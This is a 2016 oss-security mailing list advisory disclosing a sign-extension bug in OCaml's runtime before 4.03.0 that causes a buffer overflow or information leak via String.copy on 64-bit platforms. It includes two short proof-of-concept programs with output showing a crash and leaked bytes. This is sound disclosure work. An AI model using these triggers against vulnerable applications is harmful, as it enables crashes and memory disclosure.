Products Openwall GNU/*/Linux   server OS Linux Kernel Runtime Guard John the Ripper   password cracker Free & Open Source for any platform in the cloud Pro for Linux Pro for macOS Wordlists   for password cracking passwdqc   policy enforcement Free & Open Source for Unix Pro for Windows (Active Directory) yescrypt   KDF & password hashing yespower   Proof-of-Work (PoW) crypt_blowfish   password hashing phpass   ditto in PHP tcb   better password shadowing Pluggable Authentication Modules scanlogd   port scan detector popa3d   tiny POP3 daemon blists   web interface to mailing lists msulogin   single user mode login php_mt_seed   mt_rand() cracker Services Publications Articles Presentations Resources Mailing lists Community wiki Source code repositories (GitHub) Source code repositories (CVSweb) File archive & mirrors How to verify digital signatures OVE IDs What's new

Date: Fri, 29 Apr 2016 00:18:22 +0000
From: Pascal Cuoq <cuoq@...st-in-soft.com>
To: "oss-security@...ts.openwall.com" <oss-security@...ts.openwall.com>
CC: "cve-assign@...re.org" <cve-assign@...re.org>
Subject: buffer overflow and information leak in OCaml < 4.03.0

OCaml versions 4.02.3 and earlier have a runtime bug that, on 64-bit platforms, causes sizes arguments to an internal memmove call to be sign-extended from 32 to 64-bits before being passed to the memmove function.

This leads arguments between 2GiB and 4GiB to be interpreted as larger than they are (specifically, a bit below 2^64), causing a buffer overflow.

Arguments between 4GiB and 6GiB are interpreted as 4GiB smaller than they should be, causing a possible information leak.

This commit fixes the bug: https://github.com/ocaml/ocaml/commit/659615c7b100a89eafe6253e7a5b9d84d0e8df74#diff-a97df53e3ebc59bb457191b496c90762
The function caml_bit_string is called indirectly from such functions as String.copy. String.copy for instance is supposed to be a "safe" function for which OCaml's memory safety guarantees apply.

Proof of concept:
- buffer overflow

Hexa:~ $ ocamlopt -v

The OCaml native-code compiler, version 4.00.1

Standard library directory: /usr/local/Frama-C/ocaml-4.00.1p/lib/ocaml

Hexa:~ $ cat buffer_ovflw.ml

open Printf


let s1 = String.make 0x80000003 'a';;

let () = Printf.printf "%c" s1.[1];;

let s2 = String.copy s1;;

let () = Printf.printf "%c" s2.[1];;

Hexa:~ $ ocamlopt buffer_ovflw.ml && ./a.out

Segmentation fault: 11

- information leak

Hexa:~ $ cat infoleak.ml

let s1 = String.make 0x100000003 'a';;

let () = Printf.printf "%c" s1.[1];;

let s2 = String.copy s1;;

let () =

  for i = 4 to 40 do

    Printf.printf "%2x" (Char.code s2.[i]);

  done;

  Printf.printf "\n"

;;

Hexa:~ $ ocamlopt infoleak.ml && ./a.out

a 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0


OCaml applications, compiled with OCaml 4.02.3 or earlier on a 64-bit platform, that apply the defective copy functions to untrusted inputs are at risk. These applications should be recompiled with OCaml 4.03.0.

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.